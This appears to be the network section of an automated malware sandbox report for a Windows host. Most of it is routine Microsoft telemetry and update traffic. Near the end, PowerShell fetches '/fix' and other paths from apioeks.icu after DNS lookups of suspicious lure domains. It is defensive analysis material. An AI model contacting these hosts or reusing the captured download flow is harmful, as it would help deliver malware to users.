              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: gzipuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+B9tRCMpyxZbAHy&MD=ALPwh7gA HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
              Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?42cef695cf34825c08a6cc7e3c1133fa HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?6908cf5a6c8bf9b4fcacb1c08ea6b6ec HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?568de8f0c345c91edba2d12d40b3074d HTTP/1.1host: dual-s-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global trafficHTTP traffic detected: GET /apc/trans.gif?0c0bf2d7d87519af818c03c75484f319 HTTP/1.1host: dual-s-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
              Source: global trafficHTTP traffic detected: GET /fix HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: apioeks.icuConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /apis/wiRsh/jJZDv HTTP/1.1User-Agent: Mozilla/5.0Host: apioeks.icu
              Source: global trafficHTTP traffic detected: GET /apic/Qkqxz/EJDGUe HTTP/1.1Host: apioeks.icu
              Source: global trafficDNS traffic detected: DNS query: gtoyorupaz.emlnk9.com
              Source: global trafficDNS traffic detected: DNS query: gtoyorupaz.activehosted.com
              Source: global trafficDNS traffic detected: DNS query: vstrrrlineproperrms.world
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: partner.booking.com
              Source: global trafficDNS traffic detected: DNS query: bstatic.com
              Source: global trafficDNS traffic detected: DNS query: cdn.cookielaw.org
              Source: global trafficDNS traffic detected: DNS query: munchkin.marketo.net
              Source: global trafficDNS traffic detected: DNS query: try.abtasty.com
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: apioeks.icu
              Source: unknownHTTP traffic detected: POST /report/v4?s=DR4Iqh%2BOUZTqvZX5XC%2Fj88e6kQgsRtajJlV%2B1xJRox%2FULPCXeX80X3SFxkm1xU8hA29yCWeHjmAkfVOxKtsk2YTefTfY2WhBWvjRsziDpRnYMUOVuS7KvGfzkb6dL3WrTndcAZGa0XRzPLN7 HTTP/1.1host: a.nel.cloudflare.comcontent-length: 391content-type: application/reports+jsonorigin: https://vstrrrlineproperrms.worlduser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 15:10:05 GMTcontent-type: text/html; charset=UTF-8content-encoding: zstdcf-ray: 946ead42bb4bd7ac-LAXaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="946ead42bb4bd7ac"x-content-type-options: nosniffx-frame-options: SAMEORIGINcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0expires: Thu, 01
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 15:10:06 GMTcontent-type: text/html; charset=UTF-8content-encoding: zstdcf-ray: 946ead484c10d7ac-LAXaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="946ead484c10d7ac"x-content-type-options: nosniffx-frame-options: SAMEORIGINcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0expires: Thu, 01
